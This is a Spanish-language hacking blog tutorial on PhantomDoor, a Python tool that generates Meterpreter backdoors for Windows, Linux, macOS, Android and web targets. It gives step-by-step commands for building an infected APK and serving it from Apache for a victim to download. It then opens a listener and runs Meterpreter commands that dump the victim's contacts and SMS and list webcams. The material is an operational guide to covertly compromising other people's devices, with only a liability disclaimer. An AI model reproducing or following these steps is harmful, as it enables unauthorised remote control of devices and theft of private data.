Descarga tu guía de trucos informáticos aquí
PhantomDoor Hacking Windows Linux macOS Android backdoor
PhantomDoor Hacking Windows Linux macOS Android backdoor

PhantomDoor: Hacking Windows/Linux/macOS/Android con backdoor

PhantomDoor es una herramienta escrita en Python que nos permite obtener un sesión meterpreter para Windows, Linux, macOS, Android y web; incrustando un backdoor.

El funcionamiento es sencillo. Iniciamos el script; seleccionamos la plataforma objetivo (Windows, Linux, macOS, Android o web); se crea el archivo backdoor (.exe, .apk, .php, etc.) y se lo debemos pasar al víctima. Luego, abrimos una sesión de escucha esperando una conexión entrante. El resto será historia…


1. PhantomDoor: Backdoor multiplataforma

Su ejecución es sencilla. Descargamos el script y ejecutamos la herramienta:

git clone https://github.com/venom0x16/PhantomDoor
cd PhantomDoor/
chmod +x PhantomDoor.py
./PhantomDoor.py
Instalar PhantomDoor en Linux
Instalar PhantomDoor en Linux
Interfaz de PhantomDoor
Interfaz de PhantomDoor

Después de arrancar nuestro vehículo, vemos 2 de esas opciones. Entonces, ¿qué son estos?

  • (1) Backdoors (Puerta trasera): en esta sección; Crearemos nuestro virus Backdoor para infiltrarnos en el sistema objetivo.
  • (2) Listener (Oyente): en esta parte; Escuchamos la puerta trasera que creamos.
Backdoors y Listener
Backdoors y Listener

La herramienta en sí misma crea la payload para nosotros, por lo que queda infectar el archivo (exe, apk, etc.), que creamos directamente y sin tener que lidiar con el extra, en la computadora de la víctima.

2. Usar PhantomDoor

View this post on Instagram

👀 PhantomDoor: Hacking Windows/Linux/macOS/Android con backdoor 😈 . . ℹ PhantomDoor es un script en Python que permite obtener un sesión meterpreter para Windows, Linux, macOS, Android y web; incrustando un backdoor. . . ✅ Explicación: https://esgeeks.com/?p=9009 ✅ Comando: ./PhantomDoor.py . . . 👉: Sigue a EsGeeks en Instagram: @Esgeeks 👉: Sigue a EsGeeks en Facebook: @EsgeeksOficial 👉: Sigue a EsGeeks en Twitter: @Esgeeks 👉: Sigue a EsGeeks en Telegram: https://t.me/EsGeeks 👉: Sigue a EsGeeks en Discord: https://discord.gg/EyY6SPW . . ⚠️ Recuerda respetar cualquier derecho de autoría. [Descargo de Responsabilidad] Ni el autor ni @Esgeeks es responsable por el uso que realices con esta herramienta. . . . . #hacking #scripts #pytho #EsGeeks #hacker #hack #metasploit #meterpreter #payload #payloads #kalilinux #parrotos #backdoor #Androidhacking #windowshacking #linuxhacking #macoshacking #hackingwindows #hackinglinux #hackingandroid #hackingmacos #hackingweb

A post shared by ESGEEKS (@esgeeks) on

Presionamos 1 y continuar.


Ahora en la pantalla que aparece; determinamos qué sistema tiene el sistema que queremos infiltrar y continuamos (usaré Android como ejemplo,es decir la opción 3).

Backdoor para Android
Backdoor para Android

Se nos pedirá el LHOST y LPORT. Coloca cualquier LPORT (por ejemplo, 6666) y recuérdalo -porque si más adelante ingresas diferentes puertos, probablemente dará un error). Para el valor de LHOST abre una nueva Terminal y escribe el comando ifconfig; entonces colocarás tu IP local.

Configurar LHOST y LPORT
Configurar LHOST y LPORT

Después de escribir los valores de LHOST y LPORT presionamos la tecla Intro y se creará el archivo Backdoor y lo guardará en el escritorio.

Ahora, de acuerdo con el método que aplicarás, puedes “cambiar el nombre” si lo deseas. Por defecto, me creo el archivo backdoor.apk.

Entonces, después de escribir el código a continuación, copiamos nuestra puerta trasera en el directorio HTML. (estoy creando un servidor local para que la víctima descargue el archivo infectado):

service apache2 start
cp backdoor.apk /var/www/html/
Android Backdoor con PhantomDoor
Android Backdoor con PhantomDoor

Después de ejecutar lo anterior puedes comprobar que el archivo (APK) se ha copiado con éxito en la ruta /var/www/html/. Además, si ingresas a la IP local, ese archivo estará alojado ahí, listo para descargarse.

Hackear Android con Backdoor
Hackear Android con Backdoor

Backdoor en la víctima

Una vez que la víctima haya descargado el archivo y ejecutado (en mi ejemplo, instalar el APK), debemos iniciar el Oyente (opción 2) con la misma configuración que creamos el backdoor, es decir, mismo LHOST y LPORT.

Listener Backdoor
Listener Backdoor

Y entonces sucederá! Tendremos acceso a la máquina de la víctima a través de Metasploit.

Metasploit backdoor Android
Metasploit backdoor Android

Aquí, podemos ejecutar varios comandos. Por ejemplo:

sysinfo
webcam_list
dump_contacts
dump_sms
dump sms y contacts en Metasploit
dump sms y contacts en Metasploit
Descarga una hoja de comandos

Contenido relacionado:

Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)

¿Te ha gustado este artículo? Sigue este blog en su fanpage de  Facebook, TELEGRAM, Discord, TwitterInstagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!

Más artículos
Visualizar uso de ancho de banda de red con bmon